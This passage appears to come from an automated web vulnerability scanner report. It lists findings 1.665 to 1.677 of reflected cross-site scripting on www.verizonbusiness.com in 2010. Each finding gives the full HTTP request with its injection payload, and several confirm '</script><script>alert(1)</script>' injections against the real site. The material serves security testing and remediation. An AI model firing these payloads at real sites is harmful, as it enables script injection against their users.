This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/cb666'%3b828307d0b65&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/cb666';828307d0b65&+Wholesale.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.665. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d331c'%3b72228b16e48 was submitted in the REST URL parameter 1. This input was echoed as d331c';72228b16e48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd331c'%3b72228b16e48/1002a2a3-111-Contact+Centers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesd331c';72228b16e48/1002a2a3-111-Contact+Centers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.666. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a129a"%3be5305c22101 was submitted in the REST URL parameter 1. This input was echoed as a129a";e5305c22101 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesa129a"%3be5305c22101/1002a2a3-111-Contact+Centers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesa129a";e5305c22101/1002a2a3-111-Contact+Centers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.667. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f36dc</script><script>alert(1)</script>c1ce810243 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a3-111-Contact+Centers.xmlf36dc</script><script>alert(1)</script>c1ce810243 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "3d4dbfc213a05d15a8708667007248fa"
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38144
Date: Wed, 17 Nov 2010 00:22:02 GMT
Connection: close
Set-Cookie: BERT=VRID%3d8c81dcab-adee-4625-bbaf-18ae39a48692|VTID%3d101a96d7-9523-45f6-9d62-bc2d55a6f47e|SX%3d1289954522|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<url>/resources/1002a2a3-111-Contact+Centers.xmlf36dc</script><script>alert(1)</script>c1ce810243</url>
...[SNIP]...

1.668. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b94bb'%3bf4a4e8d79dc was submitted in the REST URL parameter 2. This input was echoed as b94bb';f4a4e8d79dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b94bb'%3bf4a4e8d79dc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:05 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b94bb';f4a4e8d79dc'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.669. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f817f'%3bc9a9f097994 was submitted in the REST URL parameter 1. This input was echoed as f817f';c9a9f097994 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf817f'%3bc9a9f097994/1002a2a30-111-Global+Network.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:31 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesf817f';c9a9f097994/1002a2a30-111-Global+Network.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.670. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0dba"%3b1334ba31044 was submitted in the REST URL parameter 1. This input was echoed as b0dba";1334ba31044 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb0dba"%3b1334ba31044/1002a2a30-111-Global+Network.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:54 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb0dba";1334ba31044/1002a2a30-111-Global+Network.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.671. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae7a8'%3b91ca4c070a5 was submitted in the REST URL parameter 2. This input was echoed as ae7a8';91ca4c070a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ae7a8'%3b91ca4c070a5 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:06 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ae7a8';91ca4c070a5'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.672. http://www.verizonbusiness.com/resources/1002a2a30-111-Global+Network.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a30-111-Global+Network.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fdc0</script><script>alert(1)</script>e3f72f300fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a30-111-Global+Network.xml1fdc0</script><script>alert(1)</script>e3f72f300fe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "f2254645145f05f4023291e7cb091a13"
Last-Modified: Wed, 17 Nov 2010 00:26:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d94129d77-83c1-4c97-ac0a-b3e22db60b0b|VTID%3d7ee6de4f-e045-401d-94c8-f5029dd970f1|SX%3d1289954762|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:46 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:02 GMT
Content-Length: 36652

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a30-111-Global+Network.xml1fdc0</script><script>alert(1)</script>e3f72f300fe</url>
...[SNIP]...

1.673. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc6d'%3b5c3e880db51 was submitted in the REST URL parameter 1. This input was echoed as abc6d';5c3e880db51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesabc6d'%3b5c3e880db51/1002a2a31-111-Customer+Enablement.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:41 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesabc6d';5c3e880db51/1002a2a31-111-Customer+Enablement.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.674. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6458"%3b9524cc13665 was submitted in the REST URL parameter 1. This input was echoed as e6458";9524cc13665 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese6458"%3b9524cc13665/1002a2a31-111-Customer+Enablement.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese6458";9524cc13665/1002a2a31-111-Customer+Enablement.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.675. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd81</script><script>alert(1)</script>46e407fb485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a31-111-Customer+Enablement.xml6cd81</script><script>alert(1)</script>46e407fb485 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ee3c33e340df46fccdc0ce204100c5d4"
Last-Modified: Wed, 17 Nov 2010 00:22:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d622a35aa-b448-45c9-855f-67d527e994ed|VTID%3d050726e2-c803-42c6-bbf2-24beddc4ef27|SX%3d1289954557|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:21 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:37 GMT
Content-Length: 32903

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a31-111-Customer+Enablement.xml6cd81</script><script>alert(1)</script>46e407fb485</url>
...[SNIP]...

1.676. http://www.verizonbusiness.com/resources/1002a2a31-111-Customer+Enablement.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a31-111-Customer+Enablement.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad95c'%3bf7019ef4f82 was submitted in the REST URL parameter 2. This input was echoed as ad95c';f7019ef4f82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ad95c'%3bf7019ef4f82 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:40 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ad95c';f7019ef4f82'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.677. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

